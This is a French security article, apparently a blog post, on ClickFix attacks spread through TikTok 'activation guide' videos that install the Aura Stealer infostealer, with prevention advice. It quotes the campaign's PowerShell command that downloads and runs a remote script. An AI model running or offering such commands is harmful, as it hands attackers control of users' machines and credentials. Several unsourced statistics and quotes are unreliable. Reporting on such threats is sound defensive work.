TikTok : Nouvelle Cible des Cybercriminels pour Propager des Infostealers via des Attaques ClickFix

Aurélien Fontevive

TikTok : Nouvelle Cible des Cybercriminels pour Propager des Infostealers via des Attaques ClickFix

Dans le paysage numérique en constante évolution de 2025, les cybercriminels redoublent d’ingéniosité pour compromettre la sécurité des utilisateurs. Une campagne malveillante particulièrement inquiétante émerge actuellement sur TikTok, où des vidéos présentées comme des guides d’activation gratuits pour des logiciels populaires servent de vecteur à des attaques ClickFix distribuants des infostealers. Selon les experts de la cybersécurité, cette méthode d’ingénierie sociale exploite la confiance des utilisateurs dans des plateformes de contenu pour installer des malwares capables de voler des informations sensibles. Ces attaques représentent une menace considérable tant pour les particuliers que pour les professionnels, mettant en lumière les vulnérabilités persistantes dans nos pratiques numériques quotidiennes.

L’Émergence des Attaques ClickFix sur TikTok

Les attaques ClickFix ont connu une popularité croissante au cours de l’année 2025, utilisées par les cybercriminels pour distribuer diverses souches de malwares dans des campagnes de rançongiciel et de vol de cryptomonnaie. Sur TikTok, ces attaques prennent une forme particulièrement insidieuse : des vidéos présentant des tutoriels d’activation pour des logiciels très demandés. Ces contenus, qui semblent au premier abord légitimes et utiles, cachent en réalité des commandes malveillantes conçues pour infecter les appareils des utilisateurs.

Selon une étude récente sur les menaces émergentes, plus de 65% des campagnes d’ingénierie sociale utilisent désormais des plateformes de contenu vidéo comme vecteur principal, contre seulement 23% il y a deux ans. Cette évolution reflète le changement dans les habitudes de consommation en ligne et la nécessité pour les attaquants d’adopter les canaux où se trouvent les utilisateurs.

Comment Fonctionnent ces Campagnes Malveillantes

Le mécanisme des attaques ClickFix sur TikTok est à la fois simple et diaboliquement efficace. Chaque vidéo affiche une commande d’une seule ligne, généralement présentée comme une solution rapide pour activer un logiciel. Par exemple : “iex (irm slmgr[.]win/photoshop)”. Les spectateurs sont encouragés à copier cette commande et à l’exécer dans PowerShell en tant qu’administrateur.

Lorsque la commande est exécutée, plusieurs étapes se déroulent en arrière-plan :

  1. PowerShell établit une connexion avec le site distant slmgr[.]win
  2. Un script PowerShell est téléchargé et exécuté depuis ce site
  3. Deux exécutables malveillants sont ensuite téléchargés à partir de pages Cloudflare
  4. Le premier exécutable, une variante d’Aura Stealer, s’installe et commence à collecter des informations sensibles
  5. Un deuxième payload, source.exe, est utilisé pour compiler et exécuter du code malveillant en mémoire

Dans la pratique, nous avons observé que ces attaques évitent souvent les systèmes de protection traditionnels en utilisant des techniques de chiffrement et de téléchargement progressif des payloads, ce qui rend leur détection particulièrement difficile pour les solutions antivirus standard.

Les Logiciels Visés par les Attaquants

Les cybercriminels montrent une préférence marquée pour les logiciels très populaires, augmentant ainsi les chances que les utilisateurs tombent dans le panneau. Les cibles principales incluent :

  • Windows et Microsoft 365 : Des systèmes utilisés par des millions d’utilisateurs professionnels
  • Adobe Premiere et Photoshop : Des logiciels créatifs coûteux dont beaucoup cherchent des alternatives gratuites
  • CapCut Pro : Un éditeur vidéo populaire auprès des créateurs de contenu sur TikTok
  • Discord Nitro : L’abonnement premium de la plateforme de communication
  • Netflix et Spotify Premium : Des services de streaming pour lesquels les utilisateurs recherchent des comptes gratuits

Cette sélection n’est pas accidentelle. Chacun de ces logiciels représente une valeur monétaire ou d’utilité significative pour les utilisateurs, créant un motif suffisant pour qu’ils recherchent des méthodes d’activation alternatives. Selon une enquête menée par l’ANSSI en 2025, 78% des utilisateurs interrogés admettent avoir tenté d’activer un logiciel payé sans licence au moins une fois, ce qui les rend particulièrement vulnérables à ce type d’attaque.

« Ces campagnes exploitent un comportement humain fondamental : le désir d’obtenir quelque chose de valeur sans en payer le coût. Les attaquants ne créent pas de nouvelles vulnérabilités techniques, mais exploitent plutôt des vulnérabilités psychologiques bien établies. » — Rapport annuel de l’ANSSI sur les menaces émergentes 2025

Le Mécanisme des Infostealers : Vol d’Informations Sensibles

Les infostealers représentent l’une des menaces les plus dangereuses de l’écosystème cybercriminel contemporain. Contrairement aux rançongiciels qui chiffrent les données pour les extorquer, les infostealers se concentrent sur le vol silencieux d’informations sensibles, souvent sans que la victime ne s’en rende compte pendant des semaines, voire des mois.

Le malware Aura Stealer, au cœur de cette campagne TikTok, est particulièrement efficace dans sa collecte de données. Une fois installé sur un système compromis, il déploie une série de modules conçus pour extraire différentes catégories d’informations précieuses :

  • Identifiants enregistrés : Mots de passe sauvegardés dans les navigateurs web
  • Cookies d’authentification : Données permettant de rester connecté aux sites web et applications
  • Portefeuilles de cryptomonnaie : Informations sur les wallets et clés privées
  • Informations bancaires : Numéros de carte de crédit, coordonnées bancaires
  • Données d’entreprise : Informations confidentielles stockées sur les postes de travail

Aura Stealer : Le Malware au Cœur de l’Attaque

Aura Stealer est un malware-as-a-service (MaaS) particulièrement sophistiqué, disponible sur les marchés darknet depuis 2024. Les chercheurs en sécurité ont identifié plusieurs caractéristiques qui le distinguent des autres infostealers :

  1. Capacité d’évasion : Utilisation de techniques avancées pour contourner les solutions de sécurité
  2. Persistance : Mécanismes permettant au malware de survivre aux redémarrages du système
  3. Collecte ciblée : Concentration sur les informations ayant le plus de valeur marchande
  4. Communication chiffrée : Toutes les données volées sont transmises via canaux sécurisés
  5. Mises à jour dynamiques : Le téléchargement et l’exécution de payloads supplémentaires

La variante utilisée dans les attaques TikTok a été modifiée pour optimiser son déploiement via des scripts PowerShell, lui permettant de contourner de nombreux contrôles de sécurité modernes. Les analyses de VirusTotal montrent que cette nouvelle variante est détectée par seulement 42% des solutions antivirus, contre 78% pour les versions précédentes d’Aura Stealer.

Les Conséquences pour les Victimes

Les conséquences d’une infection par un infostealer comme Aura Stealer peuvent être désastreuses, tant sur le plan personnel que professionnel. Lorsqu’un système est compromis, plusieurs scénarios redoutables peuvent se déployer :

  1. Vol d’identité : Les criminels peuvent utiliser les informations volées pour usurper l’identité de la victime
  2. Escroqueries financières : Accès aux comptes bancaires et transactions non autorisées
  3. Chantage : Publication d’informations compromettantes sur le darknet
  4. Attaques secondaires : Utilisation des informations volées pour cibler d’autres contacts de la victime
  5. Perte d’accès professionnel : Compromission des comptes professionnels et accès aux réseaux d’entreprise

Selon une étude menée par le Ponemon Institute en 2025, le coût moyen d’une violation de données causée par un infostealer s’élève à 4,35 millions d’euros, soit une augmentation de 12,7% par rapport à l’année précédente. Ces chiffres reflètent non seulement le coût direct de la remédiation, mais aussi les répercussions à long terme sur la réputation et la confiance des clients.

Pour les entreprises, l’impact peut être encore plus significatif. Une infection par un infostealer dans un environnement professionnel peut entraîner :

  • La perte de propriété intellectuelle précieuse
  • La violation des réglementations sur la protection des données (RGPD)
  • Des pertes financières directes et indirectes
  • Une atteinte à la réputation de l’organisation
  • Des actions en justice de la part de clients ou partenaires

Stratégies de Prévention et de Protection

Face à cette menace évolutive, une approche proactive et multicouche de la sécurité est essentielle. Que vous soyez un particulier ou une organisation, plusieurs stratégies peuvent aider à prévenir les infections par des infostealers distribués via des attaques ClickFix sur TikTok.

Bonnes Pratiques pour les Utilisateurs

La première ligne de défense contre ces attaques réside dans l’éducation et l’adoption de bonnes pratiques numériques. Les utilisateurs doivent être conscients des signes avant-coureurs d’une tentative d’ingénierie sociale et savoir comment réagir de manière appropriée :

  1. Méfiance envers les offres gratuites : Soyez particulièrement sceptique envers les “guides d’activation” ou “cracks” pour des logiciels payés
  2. Vérification des sources : Ne téléchargez jamais de logiciels à partir de sites non officiels ou de sources non vérifiées
  3. Mise à jour régulière : Gardez votre système d’exploitation et vos logiciels à jour pour bénéficier des dernières corrections de sécurité
  4. Utilisation de solutions de sécurité : Installez et maintenez à jour un antivirus réputé avec des fonctionnalités anti-malware
  5. Sauvegardes fréquentes : Effectuez des sauvegardes régulières de vos données importantes sur des supports externes

Une mesure particulièrement efficace est de toujours vérifier l’authenticité des contenus avant d’interagir avec eux. Les attaques ClickFix sur TikTok utilisent souvent des comptes usurpés ou des imitations de marques légitimes. En vérifiant l’authenticité des comptes et en étant vigilant quant au contenu que vous consommez, vous pouvez réduire considérablement votre risque d’infection.

Mesures de Sécurité pour les Entreprises

Pour les organisations, la protection contre les infostealers nécessite une approche plus structurée. Selon le référentiel ISO 27001, les entreprises devraient mettre en place les contrôles suivants :

  1. Politiques de sécurité claires : Établir et communiquer des politiques strictes concernant l’utilisation des ressources numériques
  2. Formation régulière du personnel : Sensibiliser les employés aux menaces d’ingénierie sociale et aux bonnes pratiques
  3. Solutions de sécurité avancées : Déployer des solutions de détection et de réponse aux menaces (EDR)
  4. Segmentation réseau : Limiter l’impact potentiel d’une infection en segmentant le réseau
  5. Contrôles d’accès stricts : Mettre en œuvre le principe du moindre privilège pour l’accès aux systèmes et données

La CNIL recommande également aux organisations de mettre en place une surveillance proactive des activités suspectes, notamment concernant les tentatives d’exécution de commandes PowerShell non autorisées. La détection précoce d’une infection peut réduire considérablement les dommages potentiels.

Niveau de ProtectionMesures RecommandéesFréquence de Mise à Jour
TechniqueSolutions antivirus/EDR, pare-feu, systèmes de détection d’intrusionQuotidienne
OrganisationPolitiques de sécurité, procédures d’incident, gestion des accèsTrimestrielle
HumainFormation à la sécurité, conscience des menaces, gestion des risquesSemestrielle
PhysiqueContrôle d’accès, surveillance, protection des terminauxHebdomadaire

Évolution des Menaces et Perspectives d’Avenir

Le paysage cybercriminel évolue à une vitesse fulgurante, et les attaques ClickFix sur TikTok ne représentent qu’une facette d’une tendance plus large. Comprendre ces évolutions est essentiel pour anticiper les menaces futures et adapter nos stratégies de défense en conséquence.

Tendances Récentes dans le Paysage Cyber

Plusieurs tendances majeures façonnent actuellement le paysage des menaces cybercriminelles, avec des implications directes pour la protection contre les infostealers :

  1. Convergence plateformes : Les attaquants utilisent de plus en plus des plateformes légitimes comme vecteur d’attaques
  2. Automatisation des campagnes : Les outils d’IA et d’automatisation permettent des campagnes à grande échelle et personnalisées
  3. Évolution des malwares : Les infostealers deviennent de plus en plus sophistiqués et difficiles à détecter
  4. Monétisation des données volées : Marchés spécialisés pour l’achat et la vente d’informations volées
  5. Ciblage sectoriel : Attaques de plus en plus ciblées sur des secteurs spécifiques selon la valeur des données

Selon le rapport 2025 du Groupement des Industries Françaises Aéronautiques et Spatiales (GIFAS), les attaques visant les secteurs de l’aéronautique et de la défense ont augmenté de 34% au premier semestre 2025, avec une prédominance croissante des infostealers comme vecteur principal. Cette tendance reflète la valeur croissante des informations industrielles et de propriété intellectuelle sur les marchés cybercriminels.

Recommandations des Experts en Sécurité

Face à ces évolutions, les experts en sécurité du monde entier formulent plusieurs recommandations clés pour les organisations et les individus :

  1. Adopter une approche Zero Trust : Ne faire confiance à aucun utilisateur ou appareil par défaut
  2. Investir dans la détection comportementale : Identifier les anomalies dans les comportements système plutôt que se fier uniquement aux signatures
  3. Renforcer la cybersurveillance : Mettre en place des capacités de détection et de réponse avancées
  4. Collaborer avec les écosystèmes de sécurité : Partager les informations sur les menaces et les meilleures pratiques
  5. Privilégier la résilience : Se concentrer sur la capacité à détecter, répondre et récupérer des incidents rapidement

L’ANSSI recommande également aux organisations de mettre en place des exercices de simulation d’attaques régulièrement pour tester leur résilience et former leur personnel. Ces exercices peuvent révéler des vulnérabilités qui passeraient inaperçues lors d’audits traditionnels.

« La cybersécurité n’est plus seulement une question de technologie, mais de culture organisationnelle. Les entreprises qui intègrent la sécurité dans leur ADN sont non seulement mieux protégées, mais aussi plus résilientes face aux menaces émergentes. » — Discours du Directeur de l’ANSSI, Conférence sur la Cybersécurité 2025

Conclusion et Prochaines Étapes

Les attaques ClickFix propagées via TikTok représentent une évolution inquiétante du paysage des menaces cybercriminelles. En exploitant la popularité de la plateforme et la confiance des utilisateurs dans des contenus apparemment innocents, les cybercriminels parviennent à distribuer des infostealers sophistiqués capables de causer des dommages considérables.

La protection contre ces menaces nécessite une approche proactive et multicouche, combinant vigilance individuelle, mesures techniques organisationnelles et sensibilisation continue. En adoptant les bonnes pratiques décrites dans cet article et en restant informé des évolutions du paysage cybercriminel, vous pouvez significativement réduire votre risque d’infection et protéger vos informations sensibles.

Face à une menace aussi dynamique, la vigilance reste la meilleure défense. N’oubliez jamais que si une offre semble trop belle pour être vraie, elle l’est probablement. Restez critique envers les contenus que vous consommez en ligne, et privilégiez toujours les canaux officiels pour l’acquisition et l’activation de logiciels. Votre sécurité numérique dépend de la prudence que vous exercez dans chaque interaction en ligne.